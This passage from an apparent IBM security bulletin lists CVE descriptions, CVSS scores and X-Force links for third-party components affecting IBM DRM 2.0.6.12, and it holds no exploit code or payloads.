(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2020-36322](<https://vulners.com/cve/CVE-2020-36322>) \n** DESCRIPTION: **Linux Kernel is vulnerable to a denial of service, caused by a flaw in the fuse_do_getattr function in the FUSE filesystem implementation in . By sending a specially-crafted request, a local attacker could exploit this vulnerability to cause the system to crash. \nCVSS Base score: 6.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/200230](<https://exchange.xforce.ibmcloud.com/vulnerabilities/200230>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-23437](<https://vulners.com/cve/CVE-2022-23437>) \n** DESCRIPTION: **Apache Xerces2 Java XML Parser is vulnerable to a denial of service, caused by an infinite loop in the XML parser. By persuading a victim to open a specially-crafted XML document payloads, a remote attacker could exploit this vulnerability to consume system resources for prolonged duration. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217982](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217982>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-10086](<https://vulners.com/cve/CVE-2019-10086>) \n** DESCRIPTION: **Apache Commons Beanutils could allow a remote attacker to gain unauthorized access to the system, caused by the failure to suppresses the class property in bean introspection by default. An attacker could exploit this vulnerability to gain unauthorized access to the classloader. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/166353](<https://exchange.xforce.ibmcloud.com/vulnerabilities/166353>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2014-0114](<https://vulners.com/cve/CVE-2014-0114>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. An attacker could exploit this vulnerability using the class parameter of an ActionForm object to manipulate the ClassLoader and execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92889](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92889>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2022-27772](<https://vulners.com/cve/CVE-2022-27772>) \n** DESCRIPTION: **Spring Boot could allow a local authenticated attacker to gain elevated privileges on the system, caused by temporary directory hijacking in org.springframework.boot.web.server.AbstractConfigurableWebServerFactory.createTempDir method. By placing a specially-crafted file, an attacker could exploit this vulnerability to take over the application. \nCVSS Base score: 7.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223090](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223090>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-3752](<https://vulners.com/cve/CVE-2021-3752>) \n** DESCRIPTION: **Linux Kernel is vulnerable to a denial of service, caused by a use-after-free flaw in the Bluetooth module. By sending a specially-crafted payload, a local attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 6.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209448](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209448>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2015-4852](<https://vulners.com/cve/CVE-2015-4852>) \n** DESCRIPTION: **The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to execute arbitrary commands via a crafted serialized Java object in T3 protocol traffic to TCP port 7001, related to oracle_common/modules/com.bea.core.apache.commons.collections.jar. NOTE: the scope of this CVE is limited to the WebLogic Server product. \nCVSS Base score: 9.8 \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2015-6420](<https://vulners.com/cve/CVE-2015-6420>) \n** DESCRIPTION: **Serialized-object interfaces in certain Cisco Collaboration and Social Media; Endpoint Clients and Client Software; Network Application, Service, and Acceleration; Network and Content Security Devices; Network Management and Provisioning; Routing and Switching - Enterprise and Service Provider; Unified Computing; Voice and Unified Communications Devices; Video, Streaming, TelePresence, and Transcoding Devices; Wireless; and Cisco Hosted Services products allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library. \nCVSS Base score: 9.8 \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2017-15708](<https://vulners.com/cve/CVE-2017-15708>) \n** DESCRIPTION: **Apache Synapse could allow a remote attacker to execute arbitrary code on the system, caused by a flaw in the Apache Commons Collections. By injecting specially-crafted serialized objects, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/136262](<https://exchange.xforce.ibmcloud.com/vulnerabilities/136262>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2015-7501](<https://vulners.com/cve/CVE-2015-7501>) \n** DESCRIPTION: **Red Hat JBoss A-MQ 6.x; BPM Suite (BPMS) 6.x; BRMS 6.x and 5.x; Data Grid (JDG) 6.x; Data Virtualization (JDV) 6.x and 5.x; Enterprise Application Platform 6.x, 5.x, and 4.3.x; Fuse 6.x; Fuse Service Works (FSW) 6.x; Operations Network (JBoss ON) 3.x; Portal 6.x; SOA Platform (SOA-P) 5.x; Web Server (JWS) 3.x; Red Hat OpenShift/xPAAS 3.x; and Red Hat Subscription Asset Manager 1.3 allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library. \nCVSS Base score: 9.8 \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2019-13116](<https://vulners.com/cve/CVE-2019-13116>) \n** DESCRIPTION: **MuleSoft Mule runtime could allow a remote attacker to execute arbitrary code on the system, caused by Java deserialization, related to Apache Commons Collections. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/169704](<https://exchange.xforce.ibmcloud.com/vulnerabilities/169704>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-3564](<https://vulners.com/cve/CVE-2021-3564>) \n** DESCRIPTION: **Linux Kernel is vulnerable to a denial of service, caused by a double free memory corruption flaw in the implementation of the BlueTooth subsystem. By sending a specially-crafted request, a local authenticated attacker could exploit this vulnerability to cause the system to crash. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/202424](<https://exchange.xforce.ibmcloud.com/vulnerabilities/202424>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2015-1796](<https://vulners.com/cve/CVE-2015-1796>) \n** DESCRIPTION: **Shibboleth Identity Provider could allow a remote attacker to bypass security restrictions, caused by an error in the PKIX trust component. An attacker could exploit this vulnerability using a certificate issued by the shibmd:KeyAuthority trust anchors to impersonate any eneity. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/105594](<https://exchange.xforce.ibmcloud.com/vulnerabilities/105594>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2020-15522](<https://vulners.com/cve/CVE-2020-15522>) \n** DESCRIPTION: **Bouncy Castle BC Java, BC C# .NET, BC-FJA, BC-FNA could allow a remote attacker to obtain sensitive information, caused by a timing issue within the EC math library. By utilize cryptographic attack techniques, an attacker could exploit this vulnerability to obtain the private key information, and use this information to launch further attacks against the affected system. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/202188](<https://exchange.xforce.ibmcloud.com/vulnerabilities/202188>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N) \n \n** CVEID: **[CVE-2020-26939](<https://vulners.com/cve/CVE-2020-26939>) \n** DESCRIPTION: **Legion of the Bouncy Castle BC and Legion of the Bouncy Castle BC-FJA could allow a remote attacker to obtain sensitive information, caused by observable differences in behavior to rrror inputs in org.bouncycastle.crypto.encodings.OAEPEncoding. By using the OAEP Decoder to send invalid ciphertext that decrypts to a short payload, a remote attacker could exploit this vulnerability to obtain sensitive information and use this information to launch further attacks against the affected system. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/191108](<https://exchange.xforce.ibmcloud.com/vulnerabilities/191108>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2019-17359](<https://vulners.com/cve/CVE-2019-17359>) \n** DESCRIPTION: **Bouncy Castle Crypto is vulnerable to a denial of service, caused by OutOfMemoryError error in ASN.1 parser. By sending specially crafted ASN.1 data, a local attacker could exploit this vulnerability to cause the application to crash. \nCVSS Base score: 4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/168581](<https://exchange.xforce.ibmcloud.com/vulnerabilities/168581>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2021-22060](<https://vulners.com/cve/CVE-2021-22060>) \n** DESCRIPTION: **VMware Tanzu Spring Framework could allow a remote authenticated attacker to bypass security restrictions, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to insert additional log entries. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2020-25704](<https://vulners.com/cve/CVE-2020-25704>) \n** DESCRIPTION: **Linux Kernel is vulnerable to a denial of service, caused by a memory leak in the perf_event_parse_addr_filter function. By executing a specially-crafted program, a local attacker could exploit this vulnerability to exhaust available memory on the system. \nCVSS Base score: 6.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/191348](<https://exchange.xforce.ibmcloud.com/vulnerabilities/191348>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-0330](<https://vulners.com/cve/CVE-2022-0330>) \n** DESCRIPTION: **Linux Kernel could allow a local attacker to obtain sensitive information, caused by a security sensitive bug in the i915 kernel driver. By sending a specially-crafted request, an attacker could exploit this vulnerability to obtain sensitive information or cause random memory corruption. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/218086](<https://exchange.xforce.ibmcloud.com/vulnerabilities/218086>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2021-35515](<https://vulners.com/cve/CVE-2021-35515>) \n** DESCRIPTION: **Apache Commons Compress is vulnerable to a denial of service, caused by an infinite loop flaw in the construction of the list of codecs that decompress an entry. By persuading a victim to open a specially-crafted 7Z archive, a remote attacker could exploit this vulnerability to cause a denial of service condition against services that use Compress' sevenz package. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/205304](<https://exchange.xforce.ibmcloud.com/vulnerabilities/205304>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-12402](<https://vulners.com/cve/CVE-2019-12402>) \n** DESCRIPTION: **Apache Commons Compress is vulnerable to a denial of service, caused by an error in the internal file name encoding algorithm. By choosing the file names inside of a specially crafted archive, a remote attacker could exploit this vulnerability to cause the application to enter into an infinite loop. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/165956](<https://exchange.xforce.ibmcloud.com/vulnerabilities/165956>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2021-35517](<https://vulners.com/cve/CVE-2021-35517>) \n** DESCRIPTION: **Apache Commons Compress is vulnerable to a denial of service, caused by an out of memory error when allocating large amounts of memory. By persuading a victim to open a specially-crafted TAR archive, a remote attacker could exploit this vulnerability to cause a denial of service condition against services that use Compress' tar package. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/205307](<https://exchange.xforce.ibmcloud.com/vulnerabilities/205307>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2018-1324](<https://vulners.com/cve/CVE-2018-1324>) \n** DESCRIPTION: **Apache Commons Compress is vulnerable to a denial of service, caused by an error in the extra field parser used by the ZipFile and ZipArchiveInputStream classes. By persuading a victim to open a specially crafted ZIP archive, a remote attacker could exploit this vulnerability to cause the application to enter into an infinite loop. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/140401](<https://exchange.xforce.ibmcloud.com/vulnerabilities/140401>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2021-36090](<https://vulners.com/cve/CVE-2021-36090>) \n** DESCRIPTION: **Apache Commons Compress is vulnerable to a denial of service, caused by an out-of-memory error when large amounts of memory are allocated. By reading a specially-crafted ZIP archive, a remote attacker could exploit this vulnerability to cause a denial of service condition against services that use Compress' zip package. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/205310](<https://exchange.xforce.ibmcloud.com/vulnerabilities/205310>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2018-11771](<https://vulners.com/cve/CVE-2018-11771>) \n** DESCRIPTION: **Apache Commons Compress is vulnerable to a denial of service, caused by the failure to return the correct EOF indication after the end of the stream has been reached by the ZipArchiveInputStream method. By reading a specially crafted ZIP archive, a remote attacker could exploit this vulnerability to cause the application to enter into an infinite loop. \nCVSS Base score: 3.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/148429](<https://exchange.xforce.ibmcloud.com/vulnerabilities/148429>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2021-35516](<https://vulners.com/cve/CVE-2021-35516>) \n** DESCRIPTION: **Apache Commons Compress is vulnerable to a denial of service, caused by an out-of-memory error when large amounts of memory are allocated. By reading a specially-crafted 7Z archive, a remote attacker could exploit this vulnerability to cause a denial of service condition against services that use Compress' sevenz package. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/205306](<https://exchange.xforce.ibmcloud.com/vulnerabilities/205306>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-23222](<https://vulners.com/cve/CVE-2021-23222>) \n** DESCRIPTION: **PostgreSQL is vulnerable to a man-in-the-middle attack, caused by improper validation of user-supplied input by libpq. A remote attacker could exploit this vulnerability to launch a man-in-the-middle attack to inject false responses to the client's first few queries, despite the use of SSL certificate verification and encryption. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/218383](<https://exchange.xforce.ibmcloud.com/vulnerabilities/218383>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2020-9492](<https://vulners.com/cve/CVE-2020-9492>) \n** DESCRIPTION: **Apache Hadoop could allow a remote authenticated attacker to gain elevated privileges on the system, caused by improper validation of SPNEGO authorization header. By sending a specially-crafted request, an authenticated attacker could exploit this vulnerability to gain elevated privileges to trigger services to send server credentials to a webhdfs path for capturing the service principal. \nCVSS Base score: 8.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/195656](<https://exchange.xforce.ibmcloud.com/vulnerabilities/195656>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2018-8009](<https://vulners.com/cve/CVE-2018-8009>) \n** DESCRIPTION: **Apache Hadoop could could allow a remote attacker to traverse directories on the system. By persuading a victim to extract a specially-crafted ZIP archive containing \"dot dot slash\" sequences (../), an attacker could exploit this vulnerability to write to arbitrary files on the system. Note: This vulnerability is known as \"Zip-Slip\" \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/150617](<https://exchange.xforce.ibmcloud.com/vulnerabilities/150617>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N) \n \n** CVEID: **[CVE-2020-13936](<https://vulners.com/cve/CVE-2020-13936>) \n** DESCRIPTION: **Apache Velocity could allow a remote attacker to execute arbitrary code on the system, caused by a sandbox bypass flaw. By modifying the Velocity templates, an attacker could exploit this vulnerability to execute arbitrary code with the same privileges as the account running the Servlet container. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/197993](<https://exchange.xforce.ibmcloud.com/vulnerabilities/197993>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2020-10683](<https://vulners.com/cve/CVE-2020-10683>) \n** DESCRIPTION: **dom4j could allow a remote authenticated attacker to obtain sensitive information, caused by an XML external entity (XXE) error when processing XML data. By sending specially crafted XML data, a remote attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/181356](<https://exchange.xforce.ibmcloud.com/vulnerabilities/181356>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2021-35603](<https://vulners.com/cve/CVE-2021-35603>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the JSSE component could allow an unauthenticated attacker to obtain sensitive information resulting in a low confidentiality impact using unknown attack vectors. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/211676](<https://exchange.xforce.ibmcloud.com/vulnerabilities/211676>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2020-13956](<https://vulners.com/cve/CVE-2020-13956>) \n** DESCRIPTION: **Apache HttpClient could allow a remote attacker to bypass security restrictions, caused by the improper handling of malformed authority component in request URIs. By passing request URIs to the library as java.net.URI object, an attacker could exploit this vulnerability to pick the wrong target host for request execution. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/189572](<https://exchange.xforce.ibmcloud.com/vulnerabilities/189572>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-40690](<https://vulners.com/cve/CVE-2021-40690>) \n** DESCRIPTION: **Apache Santuario XML Security for Java could allow a remote attacker to bypass security restrictions, caused by the improper passing of the \"secureValidation\" property when creating a KeyInfo from a KeyInfoReference element. An attacker could exploit this vulnerability to abuse an XPath Transform to extract any local .xml files in a RetrievalMethod element. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209586](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209586>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2014-3604](<https://vulners.com/cve/CVE-2014-3604>) \n** DESCRIPTION: **Not-Yet-Commons-SSL could allow a remote attacker to bypass security restrictions, caused by the failure to verify that the server hostname matches a domain name in the subject's Common Name (CN) field of the SSL certificates. By persuading a victim to visit a Web site containing a specially-crafted certificate, a remote attacker could exploit this vulnerability using man-in-the-middle techniques to cause the victim to impersonate trusted servers. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/97659](<https://exchange.xforce.ibmcloud.com/vulnerabilities/97659>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2020-28052](<https://vulners.com/cve/CVE-2020-28052>) \n** DESCRIPTION: **Legion of the Bouncy Castle BC Java could allow a remote attacker to bypass security restrictions. The OpenBSDBCrypt.checkPassword utility method compares incorrect data when checking the password. By using brute force techniques, an attacker could exploit this vulnerability to allow incorrect passwords to indicate they were matching with previously hashed ones that were different. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/193563](<https://exchange.xforce.ibmcloud.com/vulnerabilities/193563>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2014-3643](<https://vulners.com/cve/CVE-2014-3643>) \n** DESCRIPTION: **Jersey could allow a remote attacker to obtain sensitive information, caused by an XML external entity (XXE) error when processing XML data by jersey SAX parser. By sending a specially-crafted XML data, a remote attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/174788](<https://exchange.xforce.ibmcloud.com/vulnerabilities/174788>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2012-5783](<https://vulners.com/cve/CVE-2012-5783>) \n** DESCRIPTION: **Apache Commons HttpClient, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, could allow a remote attacker to conduct spoofing attacks, caused by the failure to verify that the server hostname matches a domain name in the subject's Common Name (CN) field of the X.509 certificate. By persuading a victim to visit a Web site containing a specially-crafted certificate, an attacker could exploit this vulnerability using man-in-the-middle techniques to spoof an SSL server. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/79984](<https://exchange.xforce.ibmcloud.com/vulnerabilities/79984>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2022-23596](<https://vulners.com/cve/CVE-2022-23596>) \n** DESCRIPTION: **Junrar is vulnerable to a denial of service, caused by an infinite loop when extracting RAR files. By persuading a victim to open a specially-crafted RAR file, a remote attacker could exploit this vulnerability to cause a denial of service. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/218764](<https://exchange.xforce.ibmcloud.com/vulnerabilities/218764>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-29425](<https://vulners.com/cve/CVE-2021-29425>) \n** DESCRIPTION: **Apache Commons IO could allow a remote attacker to traverse directories on the system, caused by improper input validation by the FileNameUtils.normalize method. An attacker could send a specially-crafted URL request containing \"dot dot\" sequences (/../) to view arbitrary files on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/199852](<https://exchange.xforce.ibmcloud.com/vulnerabilities/199852>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) \n \n** CVEID: **[CVE-2017-18640](<https://vulners.com/cve/CVE-2017-18640>) \n** DESCRIPTION: **SnakeYAML is vulnerable to a denial of service, caused by an entity expansion in Alias feature during a load operation. By sending a specially crafted request, a remote attacker could exploit this vulnerability to cause the application to crash. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/174331](<https://exchange.xforce.ibmcloud.com/vulnerabilities/174331>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2021-22569](<https://vulners.com/cve/CVE-2021-22569>) \n** DESCRIPTION: **Google Protocol Buffer (protobuf-java) is vulnerable to a denial of service, caused by an issue with allow interleaving of com.google.protobuf.UnknownFieldSet fields. By persuading a victim to open a specially-crafted content, a remote attacker could exploit this vulnerability to cause a timeout in ProtobufFuzzer function, and results in a denial of service condition. \nCVSS Base score: 3.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216851](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216851>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2020-7746](<https://vulners.com/cve/CVE-2020-7746>) \n** DESCRIPTION: **Node.js chart.js moudle is vulnerable to a denial of service, caused by a prototype pollution flaw when processing the options parameter. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/190880](<https://exchange.xforce.ibmcloud.com/vulnerabilities/190880>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-38153](<https://vulners.com/cve/CVE-2021-38153>) \n** DESCRIPTION: **Apache Kafka could allow a remote attacker to obtain sensitive information, caused by a timing attack flaw due to the use of \"Arrays.equals\" to validate a password or key. By utilizing brute-force attack techniques, an attacker could exploit this vulnerability to obtain credentials information, and use this information to launch further attacks against the affected system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/209762](<https://exchange.xforce.ibmcloud.com/vulnerabilities/209762>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) \n \n** CVEID: **[CVE-2020-13954](<https://vulners.com/cve/CVE-2020-13954>) \n** DESCRIPTION: **Apache CXF is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the services listing page. A remote attacker could exploit this vulnerability using the styleSheetPath in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/191650](<https://exchange.xforce.ibmcloud.com/vulnerabilities/191650>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** IBM X-Force ID: **220313 \n** DESCRIPTION: **PostgreSQL JDBC Driver could allow a remote attacker to gain unauthorized access to the system, caused by the exposure of the connection properties for configuring a pgjdbc connection. By specifying arbitrary connection properties, a remote attacker could exploit this vulnerability to gain unauthorized access to the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [https://exchange.xforce.ibmcloud.com/vulnerabilities/220313 ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/220313>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** IBM X-Force ID: **220912 \n** DESCRIPTION: **Apache HttpComponents Client could allow a remote attacker to traverse directories on the system, caused by improper validation of user requests. An attacker could send a specially-crafted URL request containing \"dot dot\" sequences (/../) to view files on the system. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [https://exchange.xforce.ibmcloud.com/vulnerabilities/220912 ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/220912>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM DRM| 2.0.6.12 \n \n\n\n## 